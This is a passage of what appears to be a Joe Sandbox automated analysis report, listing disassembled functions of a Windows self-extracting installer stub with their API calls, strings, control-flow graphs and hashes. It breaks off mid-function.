50c967-50c97d 518->530 525->499 529->518 530->463 534 50c97f-50c988 530->534 534->463
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 0050C744
                                        • Part of subcall function 0050AF98: _wcschr.LIBVCRUNTIME ref: 0050B033
                                      • _wcslen.LIBCMT ref: 0050CA0A
                                      • _wcslen.LIBCMT ref: 0050CA13
                                      • SetWindowTextW.USER32(?,?), ref: 0050CA71
                                      • _wcslen.LIBCMT ref: 0050CAB3
                                      • _wcsrchr.LIBVCRUNTIME ref: 0050CBFB
                                      • GetDlgItem.USER32(?,00000066), ref: 0050CC36
                                      • SetWindowTextW.USER32(00000000,?), ref: 0050CC46
                                      • SendMessageW.USER32(00000000,00000143,00000000,0053A472), ref: 0050CC54
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0050CC7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcschr_wcsrchr
                                      • String ID: %s.%d.tmp$<br>$<P$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$P
                                      • API String ID: 3356938749-2014984662
                                      • Opcode ID: ed85cf7ab5aeec706a2081d5e89f42cfec05520bd1d4b2cd5522edf611a6c2d6
                                      • Instruction ID: 535dea0b03490816b3da9c625ad2c79353d73512c1f5388b0e8cd466472a4505
                                      • Opcode Fuzzy Hash: ed85cf7ab5aeec706a2081d5e89f42cfec05520bd1d4b2cd5522edf611a6c2d6
                                      • Instruction Fuzzy Hash: 13E17972900219AADF24DBA4DC85EEE7BBCBF45350F4445A5F609E7090EB749F848F60
                                      Function 004FDA67 Relevance: 30.4, APIs: 4, Strings: 13, Instructions: 663COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 004FDA70
                                      • _wcschr.LIBVCRUNTIME ref: 004FDA91
                                        • Part of subcall function 004FC29A: _wcslen.LIBCMT ref: 004FC2A2
                                        • Part of subcall function 005005DA: _wcslen.LIBCMT ref: 005005E0
                                      • _wcslen.LIBCMT ref: 004FDDE9
                                      • __fprintf_l.LIBCMT ref: 004FDF1C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: _wcslen$H_prolog__fprintf_l_wcschr
                                      • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$R$RTL$STRINGS$a
                                      • API String ID: 1810648836-2415259559
                                      • Opcode ID: 425ff814532e896ebf4b28099aa0daeb315dfe0f964e29a516e6a416a26ea4c4
                                      • Instruction ID: fc5b2181501d061cb81f69956ff862f253c783fce73fbb14dc474d9600f5c338
                                      • Opcode Fuzzy Hash: 425ff814532e896ebf4b28099aa0daeb315dfe0f964e29a516e6a416a26ea4c4
                                      • Instruction Fuzzy Hash: B732F07190021DABDB24EF69C845BFE7BA5FF45300F00016BFA0597291EBB99D85CB58
                                      Function 0050D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0050B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                        • Part of subcall function 0050B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                        • Part of subcall function 0050B568: IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                        • Part of subcall function 0050B568: TranslateMessage.USER32(?), ref: 0050B5AC
                                        • Part of subcall function 0050B568: DispatchMessageW.USER32(?), ref: 0050B5B6
                                      • GetDlgItem.USER32(00000068,0054FCB8), ref: 0050D4E8
                                      • ShowWindow.USER32(00000000,00000005,?,?,0050AF07,00000001,?,?,0050B7B9,0052506C,0054FCB8,0054FCB8,00001000,00000456,00000000,00531098), ref: 0050D510
                                      • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0050D51B
                                      • SendMessageW.USER32(00000000,000000C2,00000000,005235F4), ref: 0050D529
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D53F
                                      • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0050D559
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D59D
                                      • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0050D5AB
                                      • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0050D5BA
                                      • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0050D5E1
                                      • SendMessageW.USER32(00000000,000000C2,00000000,005243F4), ref: 0050D5F0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                      • String ID: \
                                      • API String ID: 3569833718-2967466578
                                      • Opcode ID: a3c6b9a47e0b2c2e1e8ba3408e70191c6499cd1f335076b54c77616e6a25e14d
                                      • Instruction ID: 25e6efa4aa6eaf14944ff231f04f83cb917f70e59cf08673dea4b69fc4c03b36
                                      • Opcode Fuzzy Hash: a3c6b9a47e0b2c2e1e8ba3408e70191c6499cd1f335076b54c77616e6a25e14d
                                      • Instruction Fuzzy Hash: A231E171145742ABE301DF20EC5AFAF7FACEBA2359F000508F555962E0EB648B089B76
                                      Function 0050D78F Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 184COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 856 50d78f-50d7a7 call 50ec50 859 50d9e8-50d9f0 856->859 860 50d7ad-50d7b9 call 513e13 856->860 860->859 863 50d7bf-50d7e7 call 50fff0 860->863 866 50d7f1-50d7ff 863->866 867 50d7e9 863->867 868 50d801-50d804 866->868 869 50d812-50d818 866->869 867->866 870 50d808-50d80e 868->870 871 50d85b-50d85e 869->871 872 50d810 870->872 873 50d837-50d844 870->873 871->870 874 50d860-50d866 871->874 875 50d822-50d82c 872->875 876 50d9c0-50d9c2 873->876 877 50d84a-50d84e 873->877 878 50d868-50d86b 874->878 879 50d86d-50d86f 874->879 881 50d81a-50d820 875->881 882 50d82e 875->882 880 50d9c6 876->880 877->880 883 50d854-50d859 877->883 878->879 884 50d882-50d898 call 4fb92d 878->884 879->884 885 50d871-50d878 879->885 889 50d9cf 880->889 881->875 888 50d830-50d833 881->888 882->873 883->871 892 50d8b1-50d8bc call 4fa231 884->892 893 50d89a-50d8a7 call 501fbb 884->893 885->884 886 50d87a 885->886 886->884 888->873 891 50d9d6-50d9d8 889->891 894 50d9e7 891->894 895 50d9da-50d9dc 891->895 902 50d8d9-50d8dd 892->902 903 50d8be-50d8d5 call 4fb6c4 892->903 893->892 901 50d8a9 893->901 894->859 895->894 898 50d9de-50d9e1 ShowWindow 895->898 898->894 901->892 905 50d8e4-50d8e6 902->905 903->902 905->894 907 50d8ec-50d8f9 905->907 908 50d8fb-50d902 907->908 909 50d90c-50d90e 907->909 908->909 910 50d904-50d90a 908->910 911 50d910-50d919 909->911 912 50d925-50d944 call 50dc3b 909->912 910->909 913 50d97b-50d987 910->913 911->912 917 50d91b-50d923 ShowWindow 911->917 912->913 924 50d946-50d94e 912->924 919 50d998-50d9a6 913->919 920 50d989-50d996 call 501fbb 913->920 917->912 919->891 923 50d9a8-50d9aa 919->923 920->889 920->919 923->891 926 50d9ac-50d9b2 923->926 924->913 927 50d950-50d961 924->927 926->891 928 50d9b4-50d9be 926->928 927->913 930 50d963-50d96d 927->930 928->891 931 50d974 930->931 932 50d96f 930->932 931->913 932->931
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: ShowWindow$ExecuteShell_wcslen
                                      • String ID: .exe$.inf$Install$PDv<P$hP$rP
                                      • API String ID: 855908426-825748556
                                      • Opcode ID: e3c3b19439d2631ce975fbd1441adea627222bb5a48549fe3dea5a5d0d8759ed
                                      • Instruction ID: 68e979a31c28d322696c044b69f1b73f39b26b529d852479b268dc040682d4db
                                      • Opcode Fuzzy Hash: e3c3b19439d2631ce975fbd1441adea627222bb5a48549fe3dea5a5d0d8759ed
                                      • Instruction Fuzzy Hash: C151CE744083849AEB309BA49844BAFBFF4BF92744F04481EF9C4971E1E7718988DB72
                                      Function 0050ABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 933 50abab-50abca GetClassNameW 934 50abf2-50abf4 933->934 935 50abcc-50abe1 call 501fbb 933->935 937 50abf6-50abf8 934->937 938 50abff-50ac01 934->938 940 50abf1 935->940 941 50abe3-50abef FindWindowExW 935->941 937->938 940->934 941->940
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000050), ref: 0050ABC2
                                      • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0050ABE9
                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 0050ABF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: AutoClassCompleteFindNameWindow
                                      • String ID: @UJu$EDIT
                                      • API String ID: 1162832696-1013725496
                                      • Opcode ID: b04bd5e237845daa38cb4a1e3ae63ba0c2c8ab93eb795a441145ae05f4b89a3d
                                      • Instruction ID: 731202ac02d571cd38ac057efb8d897b137ef200eccee2878db56e1e16242f56
                                      • Opcode Fuzzy Hash: b04bd5e237845daa38cb4a1e3ae63ba0c2c8ab93eb795a441145ae05f4b89a3d
                                      • Instruction Fuzzy Hash: B4F0A73270032977DB2057249C0EFDF7AACAF46B51F484011BA05F31D0D760DE4995B6
                                      Function 0050B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 942 50b568-50b581 PeekMessageW 943 50b583-50b597 GetMessageW 942->943 944 50b5bc-50b5be 942->944 945 50b5a8-50b5b6 TranslateMessage DispatchMessageW 943->945 946 50b599-50b5a6 IsDialogMessageW 943->946 945->944 946->944 946->945
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0050B579
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0050B58A
                                      • IsDialogMessageW.USER32(00010400,?), ref: 0050B59E
                                      • TranslateMessage.USER32(?), ref: 0050B5AC
                                      • DispatchMessageW.USER32(?), ref: 0050B5B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 462ca71fdbade76733d458df7bdf77318ccd3934a21a53bd6e7bdfc4da414aa5
                                      • Instruction ID: 460f73148a31ef5d3a175802d1d51d0c30a17404ade6b5202561a30917fc65d3
                                      • Opcode Fuzzy Hash: 462ca71fdbade76733d458df7bdf77318ccd3934a21a53bd6e7bdfc4da414aa5
                                      • Instruction Fuzzy Hash: 9CF0BD71A0131AABDB209BE5DC5CDDF7FBCEE153917004415B509D20A0EB74D609DBB0
                                      Function 0050AC16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • OleInitialize.OLE32(00000000), ref: 0050AC2F
                                      • SHGetMalloc.SHELL32(00538438), ref: 0050AC70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: InitializeMalloc
                                      • String ID: riched20.dll
                                      • API String ID: 48681180-3360196438
                                      • Opcode ID: 3d87c0e81d857da45779c6fa5b8c95167e4c4eaa8cfbff551a5553d905821808
                                      • Instruction ID: 770c81754fb29718ab630807f74bf879555bca4c44e69dfd25f87e468c73e6ef
                                      • Opcode Fuzzy Hash: 3d87c0e81d857da45779c6fa5b8c95167e4c4eaa8cfbff551a5553d905821808
                                      • Instruction Fuzzy Hash: AAF0F9B190020AABCB10AFA9D8499EFFFFCFF94745F00415AA415A2291DBB456058FA1
                                      Function 0050DBDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 953 50dbde-50dc12 call 50ec50 call 500371 959 50dc14-50dc18 953->959 960 50dc36-50dc38 953->960 961 50dc21-50dc28 call 50048d 959->961 964 50dc1a-50dc20 961->964 965 50dc2a-50dc30 SetEnvironmentVariableW 961->965 964->961 965->960
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0050DC30
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: 78a6e0628d0df1800ecbe1bb728ce8adf5abe5ee20dec9058a8b417ef90bd379
                                      • Instruction ID: 891ad38259985be153faa01c624f9873ef9ce0de81c642d797fb4645bcd1f43b
                                      • Opcode Fuzzy Hash: 78a6e0628d0df1800ecbe1bb728ce8adf5abe5ee20dec9058a8b417ef90bd379
                                      • Instruction Fuzzy Hash: 92F0A77240523566DB311BD4DC0ABFE3F68BF15781B040411BD85960D1E6B48D51D6B0
                                      Function 0051A95B Relevance: 4.7, APIs: 3, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 966 51a95b-51a974 967 51a976-51a986 call 51ef4c 966->967 968 51a98a-51a98f 966->968 967->968 973 51a988 967->973 970 51a991-51a999 968->970 971 51a99c-51a9c0 968->971 970->971 975 51ab53-51ab66 call 50fbbc 971->975 976 51a9c6-51a9d2 971->976 973->968 978 51a9d4-51a9e5 976->978 979 51aa26 976->979 982 51aa04-51aa15 call 518e06 978->982 983 51a9e7-51a9f6 call 522010 978->983 981 51aa28-51aa2a 979->981 985 51aa30-51aa43 981->985 986 51ab48 981->986 982->986 992 51aa1b 982->992 983->986 991 51a9fc-51aa02 983->991 985->986 997 51aa49-51aa5b call 51af6c 985->997 989 51ab4a-51ab51 call 51abc3 986->989 989->975 996 51aa21-51aa24 991->996 992->996 996->981 999 51aa60-51aa64 997->999 999->986 1000 51aa6a-51aa71 999->1000 1001 51aa73-51aa78 1000->1001 1002 51aaab-51aab7 1000->1002 1001->989 1003 51aa7e-51aa80 1001->1003 1004 51ab03 1002->1004 1005 51aab9-51aaca 1002->1005 1003->986 1006 51aa86-51aaa0 call 51af6c 1003->1006 1007 51ab05-51ab07 1004->1007 1008 51aae5-51aaf6 call 518e06 1005->1008 1009 51aacc-51aadb call 522010 1005->1009 1006->989 1020 51aaa6 1006->1020 1011 51ab41-51ab47 call 51abc3 1007->1011 1012 51ab09-51ab22 call 51af6c 1007->1012 1008->1011 1024 51aaf8 1008->1024 1009->1011 1022 51aadd-51aae3 1009->1022 1011->986 1012->1011 1025 51ab24-51ab2b 1012->1025 1020->986 1026 51aafe-51ab01 1022->1026 1024->1026 1027 51ab67-51ab6d 1025->1027 1028 51ab2d-51ab2e 1025->1028 1026->1007 1029 51ab2f-51ab3f 1027->1029 1028->1029 1029->1011 1031 51ab6f-51ab76 call 51abc3 1029->1031 1031->989
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                      • Associated: 00000001.00000002.1429716074.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429730056.000000000055A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429821450.0000000000560000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000006C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.1429837020.00000000007CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4f0000_Internal.jbxd
                                      Similarity
                                      • API ID: __freea
                                      • String ID:
                                      • API String ID: 240046367-0
                                      • Opcode ID: b82d2302d0d3d6f44053efe910a6f98128de6840068c133779c06629535ff4a5
                                      • Instruction ID: 6f2196be2de087e8d31b4f888cb0e222f6cdc39e55cdcaeaa6a40bc2502dba4e
                                      • Opcode Fuzzy Hash: b82d2302d0d3d6f44053efe910a6f98128de6840068c133779c06629535ff4a5
                                      • Instruction Fuzzy Hash: AB51A072602256ABFB268E64CC45EFABBAAFF84710F154629FC05D6140EB34DCD0D691
                                      Function 0050A6C2 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 100memoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1034 50a6c2-50a6df 1036 50a6e5-50a6f6 1034->1036 1037 50a7db 1034->1037 1036->1037 1040 50a6fc-50a70b 1036->1040 1038 50a7dd-50a7e1 1037->1038 1040->1037 1042 50a711-50a71c 1040->1042 1042->1037 1044 50a722-50a737 GlobalAlloc 1042->1044 1045 50a7d3-50a7d9 1044->1045 1046 50a73d-50a746 1044->1046 1045->1038 1048 50a7cc 1046->1048 1049 50a74c-50a76a call 510320 1046->1049 1048->1045 1053 50a7c5 1049->1053 1054 50a76c-50a78e call 50a626 1049->1054 1053->1048 1054->1053 1059 50a790-50a798 1054->1059 1060 50a7b3-50a7c1 1059->1060 1061 50a79a-50a7a7 call 50eb26 1059->1061 1060->1053 1063 50a7ac-50a7ae 1061->1063 1063->1060 1065 50a7b0 1063->1065 1065->1060
                                      APIs
                                      • GlobalAlloc.KERNELBASE(00000002,00000000), ref: 0050A72D
                                        • Part of subcall function 0050A626: 74096BB0.GDIPLUS(00000010), ref: 0050A62C
                                      Strings
                                      Memory Dump Source
